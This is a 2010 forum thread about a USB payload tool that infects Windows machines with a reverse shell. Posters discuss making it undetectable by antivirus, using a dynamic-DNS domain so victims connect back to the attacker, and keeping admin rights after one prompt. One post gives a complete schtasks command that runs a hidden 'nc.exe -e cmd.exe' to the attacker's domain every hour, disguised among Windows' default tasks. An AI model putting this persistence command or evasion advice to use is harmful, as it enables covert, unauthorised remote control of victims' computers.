X3N Posted April 12, 2010 Share Posted April 12, 2010 Wow, looks great!! Any updates on virus undetection? Like making the tool FUD? and u3 too? i've written a few reverse shells in python...its not hard to do. Quote Link to comment Share on other sites More sharing options...
javabudd Posted July 1, 2010 Share Posted July 1, 2010 (edited) So today, I randomly started messing around with this payload and I thought about a few problems that one could have when using it. First off, the way the reverse shell works is that the infected computer sends out a request to connect to the attackers computer (spawning a cmd), which is done by putting your WAN IP address in the setup.inf file and others. The problem here is that most internet users do not have a static IP address, which means when your ISP changes your IP address, the reverse shell no longer works. A fix to this is a sweet program/website I found called no-ip DUC (www.no-ip.com). What this website does is allow you to create a free domain name, and using the program they offer, it auto updates your WAN IP to the domain you registered at the website. In short, if your running the no-ip program it will check your current WAN IP and update it to your domain name accordingly. So instead of typing in your IP address in the setup.inf files, you would type your domain (plcommando.no-ip.org) (remember to not include the www.). The second flaw that I found is that when you are using this program, you have to wait for them to connect to you, which is a bitch. In some previous versions, I tried using the "at" command to schedule a reverse shell interactively every few hours, but on newer versions of windows (vista, 7) the "at" command cannot be run interactively (cant execute programs). A solution to this is to use the new "schtasks" command to schedule the tasks a hell of alot easier. Instead of having 20 different jobs to schedule when you want them to connect to you, this new command makes them all possible in 1, and can be run interactively. The command is (schtasks /create /IT /SC HOURLY /TN "TASKNAME" /TR "C:\windows\system32\hidec.exe /w nc.exe -e cmd.exe "YOUR DOMAIN" "YOUR PORT") which sends a reverse shell every hour and can be switched to minutes, seconds, etc. This way you only have 1 job hidden next to several that Microsoft has in there by default. Thats all I got, my fingers hurt...<3 sable Edited July 1, 2010 by javabudd Quote Link to comment Share on other sites More sharing options...
javabudd Posted July 1, 2010 Share Posted July 1, 2010 (edited) @jen/thedadymac The program is created so that they connect to you, regardless of a router. The reason the router doesn't matter is because we are using a reverse shell method, which has the victim send a connection request to the attacker (who has his ports forwarded on his router). If you need some help pm or somethin. Edited July 1, 2010 by javabudd Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted July 2, 2010 Author Share Posted July 2, 2010 (edited) @javabudd, hey hit me up on Skype sometime you should help me and Pat w/ the new version of APE. I also have a basic working version of that System TaKeover which emails updates w/ IP addresses and stuff. Also we have an empty seat in our car to Defcon if you wanna tag along. Edited July 2, 2010 by sablefoxx Quote Link to comment Share on other sites More sharing options...
EMB Posted July 7, 2010 Share Posted July 7, 2010 Hey guys, just joined. Wouldn't you need admin for this? And it isn't autonomous on Win7 coz Win7 is a bitch and won't listen to an autorun.inf file D: Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted July 7, 2010 Author Share Posted July 7, 2010 Hey guys, just joined. Wouldn't you need admin for this? And it isn't autonomous on Win7 coz Win7 is a bitch and won't listen to an autorun.inf file D: Yes, but all you have to do is run as admin once (can auto prompt too) and you should be able to have it run as admin every time after that without prompting the user. So basically there is two button clicks instead of none :( but not terrible. Quote Link to comment Share on other sites More sharing options...
javabudd Posted April 9, 2011 Share Posted April 9, 2011 I think it's time for an update...Got some good ideas we can use! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.